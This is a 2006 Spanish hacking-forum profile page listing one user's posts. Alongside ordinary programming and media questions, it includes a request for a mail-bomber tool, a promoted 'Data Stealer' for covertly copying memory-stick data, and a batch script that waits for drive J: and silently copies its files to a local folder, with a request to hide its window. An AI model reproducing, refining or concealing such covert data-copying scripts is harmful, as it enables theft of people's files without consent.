elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 [2]
11  Seguridad Informática / Hacking / Re: Tutorial mail bomber 02 anonimo y con servidor SMTP local 100% funcional en: 15 Julio 2006, 21:37 pm
oye el link del e-mail bomber no lo puedes poner en otro lugar megaupload es que rapidshare a mi no me anda me dice que mi sesion caduco pongo bien el codigo de seguridad y todo pero nada bummmm......el minireplay si lo tengo porque entre e la pagina pero el email bomber no
12  Programación / .NET (C#, VB.NET, ASP) / Re: Duda sobre asp.net en: 13 Julio 2006, 04:50 am
ok muchisimas gracias...me sirvio de mucho
13  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Despedida Formal. en: 3 Julio 2006, 23:10 pm
Bueno sin mas paripe, no creo que hacia falta abrir un post para esto, muchas personas han tenido aqui unos anos posteando mensajes y sin masz ni menos se van (me parece, corrijanme sino, soy nuevo) otros que entran plantean su duda y mas nunca entran, y estoy seguro que muchos su cuenta aun esta en bd
14  Programación / .NET (C#, VB.NET, ASP) / Duda sobre asp.net en: 3 Julio 2006, 22:23 pm
hola tengo una duda como puedo quitar las restricciones de a la hora de crear un usuario no tenga es de la contrasena con 7 digitos minimos y bla,bla
15  Programación / Programación Visual Basic / Re: Concurso de desarrollo de aplicaciones en: 26 Junio 2006, 16:29 pm
bueno ya es hora no???
16  Programación / Programación Visual Basic / Re: Concurso de desarrollo de aplicaciones en: 21 Junio 2006, 21:37 pm
Bueno me apunto y ya tengo mi aplicacion, me parece buena porque te permite robar los datos de tu memory stick de forma oculta aqui van los datos, no tiene gran diseno pero esta bien cualuqier duda escribir a turi8ster@gmail.com


Nombre: Data Stealer (final x)
Tamano:50 KB (comprimido con winrar)
email:turi8ster@gmail.com
Pais: Cuba
Idioma: espanol
version: v1.00
Ayuda tiene

aqui dejo los link
http://www.megaupload.com/?d=XH6HHOS1

17  Media / Multimedia / Re: ver TV en el PC en: 20 Junio 2006, 19:20 pm
yo tambien conozco uno llamado TV- Live Broad....... no me acuerdo
18  Media / Diseño Gráfico / Pregunta media tonta en: 17 Junio 2006, 01:14 am
Hola quisiera saber si a una foto que tiene echa una distocion para que no se vea una cara se le puede quitar???
19  Seguridad Informática / Hacking / Re: Herramienta para recuperación de datos de MEMORIAS FLASH en: 12 Marzo 2006, 22:16 pm
Oye a mi tambien tampoco me sale la opcion de full scan y fast saca y tengo winxp
20  Informática / Tutoriales - Documentación / Re: TUTORIAL PROGRAMACION BAT en: 5 Marzo 2006, 22:15 pm
Hola hice este .bat pero lo que me pasa es que quiero que sea oculto que no se ejecute la ventana que tengo que hace???
Citar
@echo off
start explorer.exe
:bucle
If Not Exist J:\ goto cop
If exist J:\ goto copy
:cop
goto bucle

:copy
xcopy "J:\" C:\Kazaa /s /e /q

:fin
exit


Saludo
Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines